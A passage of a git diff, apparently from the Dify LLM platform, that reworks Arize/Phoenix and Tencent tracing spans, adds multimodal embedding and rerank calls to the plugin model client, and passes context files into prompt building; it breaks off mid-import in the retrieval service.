@@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ 
class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or 
trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 
@@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": 
self.project, - "message_id": trace_info.message_id, - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, 
value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." + f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 
'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes diff --git a/api/core/ops/tencent_trace/span_builder.py b/api/core/ops/tencent_trace/span_builder.py index db92e9b8bd..26e8779e3e 100644 --- a/api/core/ops/tencent_trace/span_builder.py +++ b/api/core/ops/tencent_trace/span_builder.py @@ -222,59 +222,6 @@ class TencentSpanBuilder: links=links, ) - @staticmethod - def build_message_llm_span( - trace_info: MessageTraceInfo, trace_id: int, parent_span_id: int, user_id: str - ) -> SpanData: - """Build LLM span for message traces with detailed LLM attributes.""" - status = Status(StatusCode.OK) - if trace_info.error: - status = Status(StatusCode.ERROR, trace_info.error) - - # Extract model information from `metadata`` or `message_data` - trace_metadata = trace_info.metadata or {} - message_data = trace_info.message_data or {} - - model_provider = trace_metadata.get("ls_provider") or ( - message_data.get("model_provider", "") if isinstance(message_data, dict) else "" - ) - model_name = trace_metadata.get("ls_model_name") or ( - message_data.get("model_id", "") if isinstance(message_data, dict) else "" - ) - - inputs_str = str(trace_info.inputs or "") - outputs_str = str(trace_info.outputs or "") - - attributes = { - GEN_AI_SESSION_ID: trace_metadata.get("conversation_id", ""), - GEN_AI_USER_ID: str(user_id), - GEN_AI_SPAN_KIND: GenAISpanKind.GENERATION.value, - GEN_AI_FRAMEWORK: "dify", - GEN_AI_MODEL_NAME: str(model_name), - GEN_AI_PROVIDER: str(model_provider), - GEN_AI_USAGE_INPUT_TOKENS: str(trace_info.message_tokens or 0), - GEN_AI_USAGE_OUTPUT_TOKENS: str(trace_info.answer_tokens or 0), - GEN_AI_USAGE_TOTAL_TOKENS: str(trace_info.total_tokens or 0), - GEN_AI_PROMPT: inputs_str, - GEN_AI_COMPLETION: outputs_str, - INPUT_VALUE: inputs_str, - OUTPUT_VALUE: outputs_str, - } - - if trace_info.is_streaming_request: - attributes[GEN_AI_IS_STREAMING_REQUEST] = "true" - - return SpanData( - trace_id=trace_id, - parent_span_id=parent_span_id, - span_id=TencentTraceUtils.convert_to_span_id(trace_info.message_id, "llm"), - name="GENERATION", - start_time=TencentSpanBuilder._get_time_nanoseconds(trace_info.start_time), - end_time=TencentSpanBuilder._get_time_nanoseconds(trace_info.end_time), - attributes=attributes, - 
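For reference, the rewritten `_construct_llm_attributes` flattens each prompt message, including any tool calls, into dotted OpenInference attribute paths. Roughly (literal key strings shown for readability; the code uses the semconv constants, so exact paths may differ):

```python
prompts = [
    {"role": "assistant", "content": "", "tool_calls": [
        {"id": "call-1", "type": "function",
         "function": {"name": "current_time", "arguments": "{}"}},
    ]},
]
# Expected flattened attributes, approximately:
#   llm.input_messages.0.message.role -> "assistant"
#   llm.input_messages.0.message.content -> ""
#   llm.input_messages.0.message.tool_calls.0.tool_call.function.name -> "current_time"
#   llm.input_messages.0.message.tool_calls.0.tool_call.function.arguments -> "{}"
#   llm.input_messages.0.message.tool_calls.0.tool_call.id -> "call-1"
```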
status=status, - ) - @staticmethod def build_tool_span(trace_info: ToolTraceInfo, trace_id: int, parent_span_id: int) -> SpanData: """Build tool span.""" diff --git a/api/core/ops/tencent_trace/tencent_trace.py b/api/core/ops/tencent_trace/tencent_trace.py index c345cee7a9..93ec186863 100644 --- a/api/core/ops/tencent_trace/tencent_trace.py +++ b/api/core/ops/tencent_trace/tencent_trace.py @@ -107,12 +107,8 @@ class TencentDataTrace(BaseTraceInstance): links.append(TencentTraceUtils.create_link(trace_info.trace_id)) message_span = TencentSpanBuilder.build_message_span(trace_info, trace_id, str(user_id), links) - self.trace_client.add_span(message_span) - # Add LLM child span with detailed attributes - parent_span_id = TencentTraceUtils.convert_to_span_id(trace_info.message_id, "message") - llm_span = TencentSpanBuilder.build_message_llm_span(trace_info, trace_id, parent_span_id, str(user_id)) - self.trace_client.add_span(llm_span) + self.trace_client.add_span(message_span) self._record_message_llm_metrics(trace_info) diff --git a/api/core/plugin/impl/base.py b/api/core/plugin/impl/base.py index a1c84bd5d9..7bb2749afa 100644 --- a/api/core/plugin/impl/base.py +++ b/api/core/plugin/impl/base.py @@ -39,7 +39,7 @@ from core.trigger.errors import ( plugin_daemon_inner_api_baseurl = URL(str(dify_config.PLUGIN_DAEMON_URL)) _plugin_daemon_timeout_config = cast( float | httpx.Timeout | None, - getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 300.0), + getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 600.0), ) plugin_daemon_request_timeout: httpx.Timeout | None if _plugin_daemon_timeout_config is None: diff --git a/api/core/plugin/impl/model.py b/api/core/plugin/impl/model.py index 5dfc3c212e..5d70980967 100644 --- a/api/core/plugin/impl/model.py +++ b/api/core/plugin/impl/model.py @@ -6,7 +6,7 @@ from core.model_runtime.entities.llm_entities import LLMResultChunk from core.model_runtime.entities.message_entities import PromptMessage, PromptMessageTool from core.model_runtime.entities.model_entities import AIModelEntity from core.model_runtime.entities.rerank_entities import RerankResult -from core.model_runtime.entities.text_embedding_entities import TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult from core.model_runtime.utils.encoders import jsonable_encoder from core.plugin.entities.plugin_daemon import ( PluginBasicBooleanResponse, @@ -243,14 +243,14 @@ class PluginModelClient(BasePluginClient): credentials: dict, texts: list[str], input_type: str, - ) -> TextEmbeddingResult: + ) -> EmbeddingResult: """ Invoke text embedding """ response = self._request_with_plugin_daemon_response_stream( method="POST", path=f"plugin/{tenant_id}/dispatch/text_embedding/invoke", - type_=TextEmbeddingResult, + type_=EmbeddingResult, data=jsonable_encoder( { "user_id": user_id, @@ -275,6 +275,48 @@ class PluginModelClient(BasePluginClient): raise ValueError("Failed to invoke text embedding") + def invoke_multimodal_embedding( + self, + tenant_id: str, + user_id: str, + plugin_id: str, + provider: str, + model: str, + credentials: dict, + documents: list[dict], + input_type: str, + ) -> EmbeddingResult: + """ + Invoke file embedding + """ + response = self._request_with_plugin_daemon_response_stream( + method="POST", + path=f"plugin/{tenant_id}/dispatch/multimodal_embedding/invoke", + type_=EmbeddingResult, + data=jsonable_encoder( + { + "user_id": user_id, + "data": { + "provider": provider, + "model_type": "text-embedding", + "model": model, + "credentials": 
credentials, + "documents": documents, + "input_type": input_type, + }, + } + ), + headers={ + "X-Plugin-ID": plugin_id, + "Content-Type": "application/json", + }, + ) + + for resp in response: + return resp + + raise ValueError("Failed to invoke file embedding") + def get_text_embedding_num_tokens( self, tenant_id: str, @@ -361,6 +403,51 @@ class PluginModelClient(BasePluginClient): raise ValueError("Failed to invoke rerank") + def invoke_multimodal_rerank( + self, + tenant_id: str, + user_id: str, + plugin_id: str, + provider: str, + model: str, + credentials: dict, + query: dict, + docs: list[dict], + score_threshold: float | None = None, + top_n: int | None = None, + ) -> RerankResult: + """ + Invoke multimodal rerank + """ + response = self._request_with_plugin_daemon_response_stream( + method="POST", + path=f"plugin/{tenant_id}/dispatch/multimodal_rerank/invoke", + type_=RerankResult, + data=jsonable_encoder( + { + "user_id": user_id, + "data": { + "provider": provider, + "model_type": "rerank", + "model": model, + "credentials": credentials, + "query": query, + "docs": docs, + "score_threshold": score_threshold, + "top_n": top_n, + }, + } + ), + headers={ + "X-Plugin-ID": plugin_id, + "Content-Type": "application/json", + }, + ) + for resp in response: + return resp + + raise ValueError("Failed to invoke multimodal rerank") + def invoke_tts( self, tenant_id: str, diff --git a/api/core/prompt/simple_prompt_transform.py b/api/core/prompt/simple_prompt_transform.py index d1d518a55d..f072092ea7 100644 --- a/api/core/prompt/simple_prompt_transform.py +++ b/api/core/prompt/simple_prompt_transform.py @@ -49,6 +49,7 @@ class SimplePromptTransform(PromptTransform): memory: TokenBufferMemory | None, model_config: ModelConfigWithCredentialsEntity, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: inputs = {key: str(value) for key, value in inputs.items()} @@ -64,6 +65,7 @@ class SimplePromptTransform(PromptTransform): memory=memory, model_config=model_config, image_detail_config=image_detail_config, + context_files=context_files, ) else: prompt_messages, stops = self._get_completion_model_prompt_messages( @@ -76,6 +78,7 @@ class SimplePromptTransform(PromptTransform): memory=memory, model_config=model_config, image_detail_config=image_detail_config, + context_files=context_files, ) return prompt_messages, stops @@ -187,6 +190,7 @@ class SimplePromptTransform(PromptTransform): memory: TokenBufferMemory | None, model_config: ModelConfigWithCredentialsEntity, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: prompt_messages: list[PromptMessage] = [] @@ -216,9 +220,9 @@ class SimplePromptTransform(PromptTransform): ) if query: - prompt_messages.append(self._get_last_user_message(query, files, image_detail_config)) + prompt_messages.append(self._get_last_user_message(query, files, image_detail_config, context_files)) else: - prompt_messages.append(self._get_last_user_message(prompt, files, image_detail_config)) + prompt_messages.append(self._get_last_user_message(prompt, files, image_detail_config, context_files)) return prompt_messages, None @@ -233,6 +237,7 @@ class SimplePromptTransform(PromptTransform): memory: TokenBufferMemory | None, model_config: ModelConfigWithCredentialsEntity, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: 
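Both new `PluginModelClient` methods above post the daemon's usual request envelope; for multimodal embedding it looks roughly like this (all values are placeholders, and the shape is taken from the payload assembled in the diff):

```python
# Envelope posted to plugin/{tenant_id}/dispatch/multimodal_embedding/invoke.
payload = {
    "user_id": "user-123",                  # placeholder
    "data": {
        "provider": "provider-name",        # placeholder
        "model_type": "text-embedding",
        "model": "embedding-model",         # placeholder
        "credentials": {"api_key": "..."},  # placeholder
        "documents": [{"type": "image", "url": "https://example.com/a.png"}],
        "input_type": "document",
    },
}
headers = {"X-Plugin-ID": "plugin-id", "Content-Type": "application/json"}
```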
list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: # get prompt prompt, prompt_rules = self._get_prompt_str_and_rules( @@ -275,20 +280,27 @@ class SimplePromptTransform(PromptTransform): if stops is not None and len(stops) == 0: stops = None - return [self._get_last_user_message(prompt, files, image_detail_config)], stops + return [self._get_last_user_message(prompt, files, image_detail_config, context_files)], stops def _get_last_user_message( self, prompt: str, files: Sequence["File"], image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> UserPromptMessage: + prompt_message_contents: list[PromptMessageContentUnionTypes] = [] if files: - prompt_message_contents: list[PromptMessageContentUnionTypes] = [] for file in files: prompt_message_contents.append( file_manager.to_prompt_message_content(file, image_detail_config=image_detail_config) ) + if context_files: + for file in context_files: + prompt_message_contents.append( + file_manager.to_prompt_message_content(file, image_detail_config=image_detail_config) + ) + if prompt_message_contents: prompt_message_contents.append(TextPromptMessageContent(data=prompt)) prompt_message = UserPromptMessage(content=prompt_message_contents) diff --git a/api/core/rag/data_post_processor/data_post_processor.py b/api/core/rag/data_post_processor/data_post_processor.py index cc946a72c3..bfa8781e9f 100644 --- a/api/core/rag/data_post_processor/data_post_processor.py +++ b/api/core/rag/data_post_processor/data_post_processor.py @@ -2,6 +2,7 @@ from core.model_manager import ModelInstance, ModelManager from core.model_runtime.entities.model_entities import ModelType from core.model_runtime.errors.invoke import InvokeAuthorizationError from core.rag.data_post_processor.reorder import ReorderRunner +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.rerank.entity.weight import KeywordSetting, VectorSetting, Weights from core.rag.rerank.rerank_base import BaseRerankRunner @@ -30,9 +31,10 @@ class DataPostProcessor: score_threshold: float | None = None, top_n: int | None = None, user: str | None = None, + query_type: QueryType = QueryType.TEXT_QUERY, ) -> list[Document]: if self.rerank_runner: - documents = self.rerank_runner.run(query, documents, score_threshold, top_n, user) + documents = self.rerank_runner.run(query, documents, score_threshold, top_n, user, query_type) if self.reorder_runner: documents = self.reorder_runner.run(documents) diff --git a/api/core/rag/datasource/retrieval_service.py b/api/core/rag/datasource/retrieval_service.py index 2290de19bc..a139fba4d0 100644 --- a/api/core/rag/datasource/retrieval_service.py +++ b/api/core/rag/datasource/retrieval_service.py @@ -1,23 +1,30 @@ import concurrent.futures from concurrent.futures import ThreadPoolExecutor +from typing import Any from flask import Flask, current_app from sqlalchemy import select from sqlalchemy.orm import Session, load_only from configs import dify_config +from core.model_manager import ModelManager +from core.model_runtime.entities.model_entities import ModelType from core.rag.data_post_processor.data_post_processor import 